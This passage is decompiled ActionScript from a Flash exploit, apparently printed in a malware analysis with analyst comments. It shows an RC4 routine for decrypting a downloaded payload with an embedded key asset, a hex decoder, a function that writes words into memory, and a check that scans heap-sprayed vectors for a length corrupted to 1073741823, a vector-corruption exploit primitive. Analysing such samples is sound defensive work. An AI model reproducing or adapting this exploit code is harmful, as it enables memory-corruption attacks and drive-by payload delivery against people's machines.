  // used exactly as the caller supplies it (func_step2 passes the first
  // 0x0100 bytes of the embedded keyClass asset, via encryption()).
  // Returns a new ByteArray with the XOR result; _arg2 is not modified.
  // Analyst note: static decoding of the downloaded data therefore needs
  // the embedded asset from the SWF as well as the downloaded file.
  572. public function rc4_crypt(_arg1:ByteArray, _arg2:ByteArray, _arg3:uint):ByteArray{
  573. var _local4:int;
  574. var _local5:int;
  575. var _local6:int;
  576. var _local7:uint;
  577. var _local8:uint;
  578. var _local9:ByteArray = new ByteArray();
  579. while (_local7 < _arg3) {
  580. _local4 = ((_local4 + 1) % 0x0100);
  581. _local5 = ((_local5 + _arg1[_local4]) % 0x0100);
  582. _local8 = _arg1[_local4];
  583. _arg1[_local4] = _arg1[_local5];
  584. _arg1[_local5] = _local8;
  585. _local6 = ((_arg1[_local4] + _arg1[_local5]) % 0x0100);
  586. _local9[_local7] = (_arg2[_local7] ^ _arg1[_local6]);
  587. _local7++;
  588. };
  589. return (_local9);
  590. }
  // Converts a hexadecimal string to a little-endian ByteArray, two
  // characters per byte, using parseInt(..., 16). Input is not validated:
  // an odd-length string leaves a final one-character pair, and the result
  // of parseInt on non-hex characters is written as-is.
  591. private function HexString2ByteArray(_arg1:String):ByteArray{
  592. var _local2:String;
  593. var _local3:uint = _arg1.length;
  594. var _local4:uint;
  595. var _local5:ByteArray = new ByteArray();
  596. _local5.endian = Endian.LITTLE_ENDIAN;
  597. while (_local4 < _local3) {
  598. _local2 = (_arg1.charAt(_local4) + _arg1.charAt((_local4 + 1)));
  599. _local5.writeByte(parseInt(_local2, 16));
  600. _local4 = (_local4 + 2);
  601. };
  602. return (_local5);
  603. }
  604. private function writeString(_arg1:int, _arg2:String):int{
  605. var _local3:int;
  606. var _local4:int;
  607. var _local5:int;
  608. var _local6:ByteArray = this.HexString2ByteArray(_arg2);
  609. while (_local3 < (_arg2.length / 2)) {
  610. _local5 = ((((_local6[_local3] * 16777216) + (_local6[(_local3 + 1)] * 65536)) + (_local6[(_local3 + 2)] * 0x0100)) + _local6[(_local3 + 3)]);
  611. _local3 = (_local3 + 4);
  612. this.writeUnsignedInt((_arg1 + (_local4 * 4)), _local5);
  613. _local4++;
  614. };
  615. return ((_arg1 + (_local4 * 4)));
  616. }
  617. private function checkProperty():Boolean{
  618. var _local1:int;
  619. while (_local1 < this.heapSprayLenByEnv20W) {
  620. if (this.vtObj20W[_local1].length == 1073741823){
  621. break;
  622. };
  623. _local1++;
  624. };
  625. if (_local1 == this.heapSprayLenByEnv20W){
  626. return (false);
  627. };
  628. this.changedPropertyObjIndex = _local1;
  629. return (true);
  630. }
  631.  
  632. }
  633. }//package
  634.  
  635. class theoutobj {
  636.  
  637. public function theoutobj(){
  638. }
  639. public function therundata(_arg1:uint, _arg2:uint, _arg3:uint):uint{
  640. var _local4:uint;
  641. return (_local4);
  642. }
  643.  
  644. }